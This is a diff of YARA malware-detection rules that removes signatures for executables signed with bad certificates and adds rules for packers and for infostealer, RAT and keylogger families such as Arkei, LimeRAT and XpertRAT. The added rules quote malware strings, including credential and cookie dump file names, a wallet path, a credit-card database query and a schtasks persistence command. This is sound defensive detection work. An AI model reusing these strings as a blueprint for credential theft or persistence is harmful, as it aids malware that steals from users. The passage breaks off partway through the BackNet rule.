 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xEC\\xA3\\xBC\\xEC\\x8B\\x9D\\xED\\x9A\\x8C\\xEC\\x82\\xAC \\xEC\\x97\\x98\\xEB\\xA6\\xAC\\xEC\\x8B\\x9C\\xEC\\x98\\xA8\\xEB\\x9E\\xA9" and pe.signatures [ i ] . serial == "03:d4:33:fd:c2:46:9e:9f:d8:78:c8:0b:c0:54:51:47" )
+		uint16( 0 ) == 0x5a4d and 6 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0Be3F393D1Ef0272Aed0E2319C1B5Dd0 : FILE
+rule DITEKSHEN_INDICATOR_JAVA_Packed_Allatori
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects files packed with Allatori Java Obfuscator"
 		author = "ditekSHen"
-		id = "2be05341-c7a2-58fd-9211-8d3a912a7d5c"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "16b9f455-ba73-5f09-9822-8349c53fa965"
+		date = "2023-08-29"
+		modified = "2023-08-29"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3945-L3956"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_packed.yar#L113-L121"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a7ff863b07d5ce011bdbcf86a3f562e8201926c138848544559bd1d16597ff95"
+		logic_hash = "ac48a573eb9d9fffe38d09993ff062f308edb07b8a7498e332cc3eb501d48db7"
 		score = 75
 		quality = 75
-		tags = "FILE"
-		thumbprint = "7745253a3f65311b84d8f64b74f249364d29e765"
+		tags = ""
 		importance = 20
 
+	strings:
+		$s1 = "# Obfuscation by Allatori Obfuscator" ascii wide
+
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Invincea, Inc." and pe.signatures [ i ] . serial == "0b:e3:f3:93:d1:ef:02:72:ae:d0:e2:31:9c:1b:5d:d0" )
+		all of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_65628C146Ace93037Fc58659F14Bd35F : FILE
+rule DITEKSHEN_INDICATOR_EXE_Python_Byte_Compiled : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects python-byte compiled executables"
 		author = "ditekSHen"
-		id = "9104836a-3385-5b78-9e1d-705b7ed4b721"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "04ae604c-6176-54cf-98e9-4386e52420f8"
+		date = "2023-08-29"
+		modified = "2023-08-29"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3958-L3969"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_packed.yar#L211-L220"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a6b4cc307d6e6f4d5d275ef0765a7082216b1d277c9b1328abe7cb2c2497e411"
+		logic_hash = "212d525509a4d8fb7f1b5efa929526c8758549bfdb8591c88ce602315e6b3147"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "b59165451be46b8d72d09191d0961c755d0107c8"
 		importance = 20
 
+	strings:
+		$s1 = "b64decode" ascii
+		$s2 = "decompress" ascii
+
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ESET, spol. s r.o." and pe.signatures [ i ] . serial == "65:62:8c:14:6a:ce:93:03:7f:c5:86:59:f1:4b:d3:5f" )
+		uint32( 0 ) == 0x0a0df303 and filesize < 5KB and all of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0084817E07288A5025B9435570E7Fec1D3 : FILE
+rule DITEKSHEN_INDICATOR_MSI_EXE2MSI : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables converted to .MSI packages using a free online converter."
 		author = "ditekSHen"
-		id = "31528b27-4a0c-5e97-b201-07e89248196a"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "039df7b6-e4bf-5537-ae5b-f2168044e77e"
+		date = "2023-08-29"
+		modified = "2023-08-29"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3971-L3982"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_packed.yar#L222-L233"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "89da849911c6d6a3b6d45166bd9975828887b50ee149dea4cbae9cc5c0ecf6d2"
+		logic_hash = "afd48b54766600805ae1aeef13b11de4ca160ea1f96419a4090ab9dae55fa4cd"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "f22e8c59b7769e4a9ade54aee8aaf8404a7feaa7"
+		snort2_sid = "930061-930063"
+		snort3_sid = "930022"
 		importance = 20
 
+	strings:
+		$winin = "Windows Installer" ascii
+		$title = "Exe to msi converter free" ascii
+
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE8\\xB4\\xBC\\xE8\\x89\\xBE\\xE5\\xBE\\xB7\\xE8\\xB4\\xBC\\xE6\\x8F\\x90\\xD0\\xAD\\xD0\\xAD\\xE6\\x8F\\x90\\xE8\\xB4\\xBC\\xE8\\xB4\\xBC\\xD0\\xAD\\xE5\\xBE\\xB7\\xE8\\xB4\\xBC\\xE8\\xB4\\xBC\\xE5\\xB0\\x94\\xE6\\x8F\\x90\\xE8\\x89\\xBE\\xE6\\x8F\\x90\\xE8\\xB4\\xBC\\xE5\\xB0\\x94\\xE6\\x8F\\x90\\xE8\\xB4\\xBC\\xE8\\x89\\xBE\\xD0\\xAD\\xE8\\x89\\xBE" and pe.signatures [ i ] . serial == "00:84:81:7e:07:28:8a:50:25:b9:43:55:70:e7:fe:c1:d3" )
+		uint32( 0 ) == 0xe011cfd0 and ( $winin and $title )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_4D26Bab89Fcf7Ff9Fa4Dc4847E563563 : FILE
+rule DITEKSHEN_INDICATOR_PY_Packed_Pyminifier : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects python code potentially obfuscated using PyMinifier"
 		author = "ditekSHen"
-		id = "168281bf-35ad-542a-adb4-20d719e31e2d"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "a111c116-a2b3-5689-8d44-221adf37e932"
+		date = "2023-08-29"
+		modified = "2023-08-29"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3984-L3995"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_packed.yar#L331-L339"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "3eadf6eda2819101a370688d636250085915be3ebf1b3dec7a86d12a6a5ce681"
+		logic_hash = "c7e916906d4654215de6d12e1bff790f24bcf69e97a7e5314a2a057a91b135a3"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "2be34a7a39df38f66d5550dcfa01850c8f165c81"
 		importance = 20
 
+	strings:
+		$s1 = "exec(lzma.decompress(base64.b64decode("
+
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "qvarn pty ltd" and pe.signatures [ i ] . serial == "4d:26:ba:b8:9f:cf:7f:f9:fa:4d:c4:84:7e:56:35:63" )
+		( uint32( 0 ) == 0x6f706d69 or uint16( 0 ) == 0x2123 or uint16( 0 ) == 0x0a0d or uint16( 0 ) == 0x5a4d ) and all of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00D9D419C9095A79B1F764297Addb935Da : FILE
+rule DITEKSHEN_MALWARE_Win_Laturo : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Laturo information stealer payload"
 		author = "ditekSHen"
-		id = "7c45a78c-2cde-5200-81fd-239effef7fe6"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "221a1ee8-e1ae-558c-919c-e3f55c1500f0"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3997-L4008"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3-L26"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "dd35b48752eec01e1bfff182410da9a857735e0052e9c1a0d7c366dbee808d3c"
+		logic_hash = "bfb0c5676c926f58a4395a56dad09b37e8ac1cf0bf6b5521767c16698644b73a"
 		score = 75
-		quality = 75
+		quality = 61
 		tags = "FILE"
-		thumbprint = "7d45ec21c0d6fd0eb84e4271655eb0e005949614"
-		importance = 20
+		clamav_sig = "MALWARE.Win.Trojan.Laturo"
+
+	strings:
+		$str1 = "cmd.exe /c ping 127.0.0.1" ascii wide
+		$str2 = "cmd.exe /c start" ascii wide
+		$str3 = "\\RapidLoader\\" ascii
+		$str4 = "loader/gate.php" ascii wide
+		$str5 = "Hwid:" ascii wide
+		$str6 = "Special:" ascii wide
+		$str7 = "logs=%s" ascii
+		$data1 = "cookies.%u.txt" nocase ascii wide
+		$data2 = "passwords.%u.txt" nocase ascii wide
+		$data3 = "credentials.%u.txt" nocase ascii wide
+		$data4 = "cards.%u.txt" nocase ascii wide
+		$data5 = "autofill.%u.txt" nocase ascii wide
+		$data6 = "loginusers.vdf" ascii wide
+		$data7 = "screenshot.bmp" nocase ascii wide
+		$data8 = "webcam.bmp" nocase ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Nova soft" and pe.signatures [ i ] . serial == "00:d9:d4:19:c9:09:5a:79:b1:f7:64:29:7a:dd:b9:35:da" )
+		uint16( 0 ) == 0x5a4d and 5 of ( $str* ) and 1 of ( $data* )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_02E44D7D1D38Ae223B27A02Bacd79B53 : FILE
+rule DITEKSHEN_MALWARE_Win_Xpertrat : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "XpertRAT payload"
 		author = "ditekSHen"
-		id = "7f2ad143-c46b-58cb-9fe5-c7bb9c6d9234"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "cea7de47-b47c-5fea-96ee-5858b16cca8d"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4010-L4021"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L28-L56"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7ab506b2e4a716bc6f7115a071f46df4ea4ac88a4b636506a13ac0d383664e58"
+		logic_hash = "2a521bd1d6ce16fa16aa7757db2657dcab15e6802454ad899906d4ed17401feb"
 		score = 75
-		quality = 75
+		quality = 63
 		tags = "FILE"
-		thumbprint = "34e0ecae125302d5b1c4a7412dbf17bdc1b59f04"
-		importance = 20
+		snort_sid = "920003-920006"
+		clamav_sig = "MALWARE.Win.Trojan.XpertRAT"
+
+	strings:
+		$v1 = "[XpertRAT-Mutex]" fullword wide
+		$v2 = "XPERTPLUGIN" fullword wide
+		$v3 = "+Xpert+3." wide
+		$v4 = "keylog.tmp" fullword wide
+		$v5 = "\\TempReg.reg" fullword wide
+		$s1 = "ClsKeylogger" fullword ascii nocase
+		$s2 = "clsCamShot" fullword ascii nocase
+		$s3 = "ClsShellCommand" fullword ascii nocase
+		$s4 = "ClsRemoteDesktop" fullword ascii nocase
+		$s5 = "ClsScreenRemote" fullword ascii nocase
+		$s6 = "ClsSoundRemote" fullword ascii nocase
+		$s7 = "MdlHidder" fullword ascii
+		$s8 = "modKeylog" fullword ascii
+		$s9 = "modWipe" fullword ascii
+		$s10 = "modDelProcInUse" fullword ascii
+		$s11 = "Socket_DataArrival" fullword ascii
+		$s12 = "cZip_EndCompress" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Zhuhai Kingsoft Office Software Co., Ltd." and pe.signatures [ i ] . serial == "02:e4:4d:7d:1d:38:ae:22:3b:27:a0:2b:ac:d7:9b:53" )
+		uint16( 0 ) == 0x5a4d and ( 3 of ( $v* ) or 6 of ( $s* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_041868Dd49840Ff44F8E3D3070568350 : FILE
+rule DITEKSHEN_MALWARE_Win_Isrstealer : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "ISRStealer payload"
 		author = "ditekSHen"
-		id = "2cfbae1f-9c8a-5263-b9d6-5be27fdca822"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "d6c3acdd-e881-5f97-8856-b7b60f56a1c2"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4023-L4034"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L112-L128"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "80abb596d96cb388bf3ff23598fc889d4c14cccf262d01f10a5be3a738a4907e"
+		logic_hash = "5dd030ab8122b5dd432168647c7a3465cb3593a326f68b4863a91d16587641e5"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "e104f236e3ee7d21a0ea8053fe8fc5c412784079"
-		importance = 20
+		clamav_sig = "MALWARE.Win.Trojan.ISRStealer"
+
+	strings:
+		$s1 = "&password=" wide
+		$s2 = "&pcname=" wide
+		$s3 = "MSVBVM60.DLL" ascii
+		$s4 = "MSVBVM60.DLL" wide
+		$s5 = "Core Software For : Public" wide
+		$s6 = "</Host>" wide
+		$s7 = "</Pass>" wide
+		$s8 = "/scomma" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Zhuhai Kingsoft Office Software Co., Ltd." and pe.signatures [ i ] . serial == "04:18:68:dd:49:84:0f:f4:4f:8e:3d:30:70:56:83:50" )
+		( uint16( 0 ) == 0x5a4d and filesize < 4000KB and 6 of them ) or all of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_C501B7176B29A3Cb737361Cf85414874 : FILE
+rule DITEKSHEN_MALWARE_Win_Limerat : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "LimeRAT payload"
 		author = "ditekSHen"
-		id = "8bebf02c-de14-5488-8720-5fc98b0799bd"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "a4b85cad-97a8-514c-9380-f3e8ec95a44d"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4036-L4047"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L152-L168"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f3eb67b39e0e4e12388f17d231fadfc2ea36b1568191a411950c2e24c32ed09c"
+		logic_hash = "8ae35c5fa48773b93da0b76b238fc8dbaf19fdeb6fd81bf23842c5121d620116"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "0788801185a6bf70b805c2b97a7c6ce66cfbb38d"
-		importance = 20
+
+	strings:
+		$s1 = "schtasks /create /f /sc ONLOGON /RL HIGHEST /tn LimeRAT-Admin /tr" wide
+		$s2 = "\\vboxhook.dll" fullword wide
+		$s3 = "Win32_Processor.deviceid=\"CPU0\"" fullword wide
+		$s4 = "select CommandLine from Win32_Process where Name='{0}'" wide
+		$s5 = "Minning..." fullword wide
+		$s6 = "Regasm.exe" fullword wide
+		$s7 = "Flood!" fullword wide
+		$s8 = "Rans-Status" fullword wide
+		$s9 = "cmd.exe /c ping 0" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE5\\x8B\\x92\\xE8\\x89\\xBE\\xE8\\xAF\\xB6\\xE8\\x89\\xBE\\xE8\\xB4\\x9D\\xE8\\xAF\\xB6\\xE8\\xAF\\xB6\\xE8\\xB4\\x9D\\xE5\\x90\\xBE\\xE5\\xBC\\x97\\xE5\\xBC\\x97\\xE5\\x90\\xBE\\xE8\\xAF\\xB6\\xE5\\x8B\\x92\\xE8\\xB4\\x9D\\xE5\\xBC\\x97\\xE5\\x90\\xBE\\xE5\\x90\\xBE\\xE8\\xAF\\xB6\\xE8\\x89\\xBE\\xE5\\x90\\xBE\\xE5\\x90\\xBE\\xE8\\x89\\xBE\\xE5\\xBC\\x97\\xE5\\xBC\\x97" and pe.signatures [ i ] . serial == "c5:01:b7:17:6b:29:a3:cb:73:73:61:cf:85:41:48:74" )
+		uint16( 0 ) == 0x5a4d and 5 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_234Bf4Ef892Df307373638014B35Ab37 : FILE
+rule DITEKSHEN_MALWARE_Win_Arkei : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detect Arkei infostealer variants"
 		author = "ditekSHen"
-		id = "af403af3-2c10-5742-80f2-c507695106a2"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "d32a27bf-abb9-553c-9913-d675c340a5c5"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4049-L4060"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L210-L226"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d01dbb798b309927e666e5e68c56c6eeabad7ccbc427d62f0507597c6e9e7aa7"
+		logic_hash = "8a79bcc6ac94900c8a8913b2e81424bf900bbac416f44a91db6f208f23980155"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "348f7e395c77e29c1e17ef9d9bd24481657c7ae7"
-		importance = 20
+
+	strings:
+		$s1 = "C:\\Windows\\System32\\cmd.exe" fullword ascii wide
+		$s2 = "/c taskkill /im " fullword ascii
+		$s3 = "card_number_encrypted FROM credit_cards" ascii
+		$s4 = "\\wallet.dat" ascii
+		$s5 = "Arkei/" wide
+		$s6 = "files\\passwords." ascii wide
+		$s7 = "files\\cc_" ascii wide
+		$s8 = "files\\autofill_" ascii wide
+		$s9 = "files\\cookies_" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . serial == "23:4b:f4:ef:89:2d:f3:07:37:36:38:01:4b:35:ab:37" )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_C650Ae531100A91389A7F030228B3095 : FILE
+rule DITEKSHEN_MALWARE_Win_Obliquerat : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "ObliqueRAT payload"
 		author = "ditekSHen"
-		id = "80ee9422-190d-5a4e-9a4c-fb8d1b2e2f8c"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "5a184299-6c16-56b3-88da-37435fbfcde5"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4062-L4073"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L294-L314"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e5afd76711e1b466d7eba742f50c7f9551498796f0aca45566bd9686034efac3"
+		logic_hash = "0b8bbf031364b828a972c52e1a8985ff65601ca7413e6e7ae3a5be981f086b9e"
 		score = 75
-		quality = 75
+		quality = 25
 		tags = "FILE"
-		thumbprint = "05eebfec568abc5fc4b2fd9e5eca087b02e49f53"
-		importance = 20
+
+	strings:
+		$s1 = "C:\\ProgramData\\auto.txt" fullword ascii
+		$s2 = "C:\\ProgramData\\System\\Dump\\" fullword ascii
+		$s3 = "C:\\ProgramData\\a.txt" fullword ascii
+		$s4 = "Oblique" fullword ascii
+		$s5 = /(Removable|Hard|Network|CD|RAM)\sDisk\|/ ascii
+		$s6 = "backed" fullword ascii
+		$s7 = "restart" fullword ascii
+		$s8 = "kill" fullword ascii
+		$s9 = /(John|JOHN|Test|TEST|Johsnson|Artifact|Vince|Serena|Lisa|JOHNSON|VINCE|SERENA)/ ascii nocase
+		$v1 = "C:\\ProgramData" fullword ascii
+		$v2 = "auto" fullword ascii
+		$v3 = "plit" fullword ascii
+		$v4 = ":image/jpeg" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "POKEROWA STRUNA SP Z O O" and pe.signatures [ i ] . serial == "c6:50:ae:53:11:00:a9:13:89:a7:f0:30:22:8b:30:95" )
+		uint16( 0 ) == 0x5a4d and 8 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_4F8Ebbb263F3Cbe558D37118C43F8D58 : FILE
+rule DITEKSHEN_MALWARE_Win_Firebirdrat : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Firebird/Hive RAT payload"
 		author = "ditekSHen"
-		id = "c273f7e4-8c88-5205-be4b-3a8e8bed144e"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "456ae70e-8004-5fb0-a4fd-ce7c0f4704f9"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4075-L4086"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L316-L339"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e502e7e08fa82f8bd1b2b15c34999ece6b3d59d75ab1a4dda05b4b9440c49b7c"
+		logic_hash = "1c24e924171db1b99a3b03764f4551b6f4b6b1c9c6147b49dbc0651e85e9040c"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "3f27a35fe7af06977138d02ad83ddbf13a67b7c3"
-		importance = 20
+		clamav_sig = "MALWARE.Win.Trojan.Firebird-HiveRAT"
+
+	strings:
+		$id1 = "Firebird Remote Administration Tool" fullword wide
+		$id2 = "Welcome to Firebird! Your system is currently being monitored" wide
+		$id3 = "Hive Remote Administration Tool" fullword wide
+		$id4 = "Welcome to Hive! Your system is currently being monitored" wide
+		$s1 = "REPLACETHESEKEYSTROKES" fullword wide
+		$s2 = "_ENABLE_PROFILING" fullword wide
+		$s3 = ": KeylogSubject" wide
+		$s4 = "Firebird.CommandHandler" fullword wide
+		$s5 = "webcamenabled" fullword ascii
+		$s6 = "screenlogs" fullword ascii
+		$s7 = "encryptedconnection" fullword ascii
+		$s8 = "monitoron" fullword ascii
+		$s9 = "screenGrab" fullword ascii
+		$s10 = "TCP_TABLE_OWNER_PID_ALL" fullword ascii
+		$s11 = "de4fuckyou" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Maxthon Technology Co, Ltd." and pe.signatures [ i ] . serial == "4f:8e:bb:b2:63:f3:cb:e5:58:d3:71:18:c4:3f:8d:58" )
+		uint16( 0 ) == 0x5a4d and ( 1 of ( $id* ) or 7 of ( $s* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_01Ea62E443Cb2250C870Ff6Bb13Ba98E : FILE
+rule DITEKSHEN_MALWARE_Win_Phoenix : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Phoenix/404KeyLogger keylogger payload"
 		author = "ditekSHen"
-		id = "40c5f73b-70b6-5db7-8060-01ad77e5f319"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "62101881-9b5e-586d-8e1b-184787f25d6b"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4088-L4099"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L341-L367"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "dbf281989fb89976f83e0e2395f02c1e8c4c9ec5f96095786d9c6406518eb315"
+		logic_hash = "b2c2a4ffc36d708a121853fb0268e6dc85b3fe2cd58e05c8124cbef18e03ec0b"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "f293eed3ff3d548262cddc43dce58cfc7f763622"
-		importance = 20
+		clamav_sig = "MALWARE.Win.Trojan.Phoenix-Keylogger"
+
+	strings:
+		$s1 = "FirefoxPassReader" fullword ascii
+		$s2 = "StartKeylogger" fullword ascii
+		$s3 = "CRYPTPROTECT_" ascii
+		$s4 = "Chrome_Killer" fullword ascii
+		$s5 = "Clipboardlog.txt" fullword wide
+		$s6 = "Leyboardlogs.txt" fullword wide
+		$s7 = "Persistence'" wide
+		$s8 = "set_HKB" fullword ascii
+		$s9 = "loloa" fullword ascii
+		$s10 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)" fullword wide
+		$m1 = "- Screenshot -------|" ascii wide
+		$m2 = "- Clipboard -------|" ascii wide
+		$m3 = "- Logs -------|" ascii wide
+		$m4 = "- Passwords -------|" ascii wide
+		$m5 = "PSWD" ascii wide
+		$m6 = "Screenshot |" ascii wide
+		$m7 = "Logs |" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Tencent Technology(Shenzhen) Company Limited" and pe.signatures [ i ] . serial == "01:ea:62:e4:43:cb:22:50:c8:70:ff:6b:b1:3b:a9:8e" )
+		( uint16( 0 ) == 0x5a4d and 6 of ( $s* ) or 3 of ( $m* ) ) or 9 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_726Ee7F5999B9E8574Ec59969C04955C : FILE
+rule DITEKSHEN_MALWARE_Win_Backnet : FILE
 {
 	meta:
-		description = "Detects IntelliAdmin commercial remote administration signing certificate"
+		description = "BackNet payload"
 		author = "ditekSHen"
-		id = "5e88abd2-97d5-5271-ace5-6b7cb2cd6633"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "c53ef72f-4957-5ddb-b096-dcdb69cf900d"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4101-L4112"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L369-L386"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
